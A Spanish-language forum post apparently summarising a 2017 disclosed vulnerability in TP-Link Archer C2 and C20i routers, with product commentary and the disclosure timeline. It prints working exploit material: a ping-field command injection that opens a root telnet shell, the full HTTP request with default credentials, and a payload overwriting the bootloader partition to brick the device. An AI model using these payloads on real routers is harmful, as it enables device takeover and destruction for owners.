Se desvelan vulnerabilidades muy sevras en los "Archer ac" C2 y C20i

[h]Dos modelos de la serie “Archer” (WiFi doble banda con soporte “ac”) tienen brechas muy serias mediante apertura de sesión telnet con derechos de administrador, [/h]
https://www.wifi-libre.com/img/members/3/archerac_1.png

Pierre.kim ha relevado varias brechas muy interesantes en 2016 (contra routers de D-Link, Huawei, Totolink…) y vuelve a la carga en 2017.
Esta vez es al fabricante TP-Link que se ha interesado.
Ha encontrado una vulnerabilidad critica en los routers Archer; los productos estrellas de la firma china que son compatibles con estándar “ac”
Podéis leer todos los detalles en:
[list=*]
]TP-Link C2 / C20i Command Injection / Denial Of Service de Pierre Kin @ Packet Storm/]
[/list]

El Archer c2 es un PA ac relativamente barato (por llevar wifi “ac”) y que parece decente.
Su wifi “ac” no es alucinante (dos antenas) pero son antenas externas.
Mejor un “ac” de dos antenas externas que un “ac” más rápido de tres antenas internas.
Porque si hay que ser a tres metros del router para gozar de la velcoidad ac… ¡Mejor conectarse por cable!
El **Archer C20i **es un PA ac un poco más barato pero… es muy poco atractivo.
Su wifi ac es flojito sin antenas externas y además no tiene puertos gigabit… Ni interesa para conectarse por cable. :stuck_out_tongue:

La brecha desvelada es en esencia que un intruso puede ejecutar ordenes **telenet(d)**con privilegios de administrador.
telent es una potente herramienta para la gestión remota del router,
Poder usar este protocolo es un sueño para un hacker juguetón
Para inyectar comandos telnet se solicita la “pagina para diagnósticos” de la interfaz web
Se insertan los ordenes que queremos ejecutar en el campo reservado al ping
algo así:

$(echo 127.0.0.1; /usr/sbin/telnetd -l bin/sh -p 25)

Con esto abriremos una consola telnetd con sh en el puerto 25
Se manda en una petición http:

[code]POST /cgi?2 HTTP/1.1
Host: 192.168.1.1
Content-Type: text/plain
Referer: http://192.168.1.1/mainFrame.htm
Content-Length: 208
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
Connection: close

[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6
dataBlockSize=64
timeout=1
numberOfRepetitions=1
host=$(echo 127.0.0.1; /usr/sbin/telnetd -l bin/sh -p 25)
X_TP_ConnName=ewan_ipoe_d
diagnosticsState=Requested[/code]
Podéis ver los credenciales en base 64 en la linea " Cookie: Authorization ": YWRtaW46YWRtaW4=
No los teníamos y ahora los tenemos :smiley: : https://www.wifi-libre.com/img/members/3/archerac_2.jpg
Ni hace falta indicarlos, la sesión esta abierta y se puede empezar a trabajar:

user@kali:~/tplink-0day-c2-and-c20i$ telnet 192.168.1.1 25 Trying 192.168.1.1... Connected to 192.168.1.1. Escape character is '^]'. ~ # ls web usr sbin mnt lib dev var sys proc linuxrc etc bin

A partir de ahí se pueden inventar exploits de todo tipo…
El que sigue es realmente muy peligroso y fastidioso.
¡Vamos!.. Es destrucción pura, vandalismo en el sentido original de la palabra.
Se basa por supuesto en esta capacidad a inyectar ordenes telnet…
Si alguien te pega esta broma de mal gusto vas a pasar un muy mal rato… :stuck_out_tongue:
Consiste en sobrescribir el inicio de la partición U-bot con caracteres aleatorios…
El router se volverá loco y no podrá arrancar de nuevo.
Tendrás que hackear el dispositivo si no quieres tener un ladrillo…
Se podría hacer inyectando esta linea de ordenes

$(echo 127.0.0.1; cat /dev/random > /dev/mtd0)

Reemplazamos el contenido de **mtd0 **con números aleatorios (dev/random) .

Si leéis el documento veréis también cómo hacer una DoS imparable y cómo manipular las reglas del corta-fuego.
Telnet es un protocolo que permite hacer de todo y se pueden elaborar miles de ataques devastadores con una consola telnet con privilegios root.

Me quejo siempre de los fabricantes que muchas veces pasan de todo y dejan las brechas sin arreglos. .
Esta vez los de TP-Link parecen no haberlo hecho tan mal.

[code]* Sep 17, 2016: Vulnerabilities found by Pierre Kim.

  • Dec 26, 2016: TP-Link support is contacted by livechat. TP-Link
    replies there is no process to handle security problems in TP-Link
    routers and refuses to indicate a security point of contact.
  • Dec 27, 2016: TP-Link support is notified of the vulnerabilities
    (using support () tp-link.com, security () tp-link.com, lishaozhang ()
    tp-link.net [from /lib/modules/ipt_STAT.ko], huangwenzhong ()
    tp-link.net [from /lib/modules/tp_domain.ko]).
  • Dec 29, 2016: Pierre sends a full advisory to TP-Link security team.
  • Dec 30, 2016: TP-Link confirms the reception of the advisory.
  • Jan 03, 2017: Pierre asks TP-Link to confirm the vulnerabilities.
  • Jan 09, 2017: TP-Link confirms the security vulnerabilities in
    TP-Link C2 and C20i routers and security patches are in progress.
  • Jan 21, 2017: Ping from TP-Link about the “Vendor Response” section.
  • Jan 23, 2017: Pierre answers, asking details in the “Vendor Response” section.
  • Jan 24, 2017: TP-Link Korea contacts Pierre Kim about the vulnerabilities.
  • Jan 27, 2017: Pierre sends a final draft to TP-Link.
  • Feb 09, 2017: A public advisory is sent to security mailing lists.
    [/code]
    La primera respuesta es para flipar: No han querido dar le un contacto para hablar de la brecha. :smiley:
    Al final han tratado el asunto y los parches deberían salir este mes…
    Más o menos un mes y medio para tomar conocimiento del asunto y resolverlo.
    No es para darles un grammy award pero no está tan mal. :smiley: